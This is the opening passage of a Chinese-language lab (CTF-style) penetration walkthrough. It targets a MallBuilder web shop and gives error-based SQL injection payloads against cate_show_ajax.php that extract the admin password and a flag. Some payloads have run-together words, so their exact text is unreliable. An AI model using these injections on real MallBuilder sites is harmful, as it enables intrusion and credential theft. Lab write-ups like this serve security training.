原标题:【案例分析】记一次综合靶场实战渗透
时间有点久,这里主要和大家分享一下思路。
该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网。
开始渗透
首先进入靶场开放的唯一一个开放的web端。
进入网站首页,发现是Mallbuilder,并且该版本有注入漏洞,可以直接获取管理员密码。
payload:
/cate_show_ajax.php?oper=ajax& call=get_cate POST catid= 12313213131313113) andEXP(~( SELECT* FROM( SElectuserFROMmallbuilder_admin)a limit0, 1)) #
md5解密后得知admin 密码为:mall123!@#
可以通过sql注入获取第一个flag
payload:
/cate_show_ajax.php?oper=ajax& call=get_cate
post提交:
catid= 12313213131313113) andEXP(~( SELECT* FROM( SElectflag FROMflag)a)) #
得到第一个flag
登录管理账号admin 密码为 mall123!@# ,